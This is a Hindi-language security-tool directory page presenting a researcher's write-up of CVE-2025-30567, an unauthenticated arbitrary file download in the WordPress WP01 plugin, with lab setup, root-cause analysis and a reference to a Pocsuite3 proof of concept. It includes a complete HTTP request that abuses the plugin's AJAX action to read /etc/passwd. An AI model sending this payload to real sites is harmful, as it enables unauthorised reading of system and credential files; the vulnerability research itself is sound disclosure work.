Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-30567 — WordPress WP01 में अनधिकृत मनमानी फ़ाइल डाउनलोड | Kitploit
उपकरण/GitHubGitHub/oyst3r1ng/cve-2025-30567
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHuboyst3r1ng/cve-2025-30567

CVE-2025-30567

WordPress WP01 में अनधिकृत मनमानी फ़ाइल डाउनलोड

रिपॉजिटरी देखें
111 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

परिचय

WordPress WP01 में अनधिकृत मनमाना फ़ाइल डाउनलोड!

पर्यावरण सेटअप

चरण 1: WP01 प्लगइन डाउनलोड करें, लेकिन...

alt text

हा हा, चिंता न करें, यहाँ प्लगइन का सोर्स कोड है।

चरण 2: दिए गए wp01 फ़ोल्डर को पैकेज करें और इसे WordPress प्लगइन्स अनुभाग में अपलोड करें। इस तरह-->

alt text

विश्लेषण

यह सरल है—भेद्यता निम्नलिखित बिंदु पर ट्रिगर होती है:

alt text

आगे, देखें कि make_archive मेथड कहाँ कॉल होती है।

alt text

दो AJAX एक्शन हुक मौजूद हैं—एक लॉग-इन उपयोगकर्ताओं के लिए और दूसरा गैर-लॉग-इन उपयोगकर्ताओं के लिए। यही अनधिकृत पहुँच भेद्यता का कारण है।

ठीक है, अब स्थानीय मशीन पर /etc/passwd की सामग्री पढ़ने के लिए पेलोड तैयार करते हैं।

root@kitploit:~
POST /wp-admin/admin-ajax.php?action=wp01_generate_zip_archive HTTP/1.1
Host: 192.168.43.133
accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: cb_lang=zh-cn; PHPSESSID=8b29e9ec5200189ba7e72e98d4c6d017; WS_ADMIN_URL=ws://192.168.43.133/notice; WS_CHAT_URL=ws://192.168.43.133/msg; wordpress_test_cookie=WP%20Cookie%20check; XDEBUG_SESSION=PHPSTORM; wp01-lang=en; wp_lang=en_US
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

target=passwd&path=/etc/

परिणाम:

alt text

alt text

ठीक है, आगे, इस wp-01-passwd.zip फ़ाइल को डाउनलोड करें।

alt text

Poc

Pocsuite3 के आधार पर लिखा गया है, विवरण के लिए Poc_CVE-2025-30567.py देखें।

alt text

संदर्भ

CVE-2025-30567

टूल डाउनलोड करें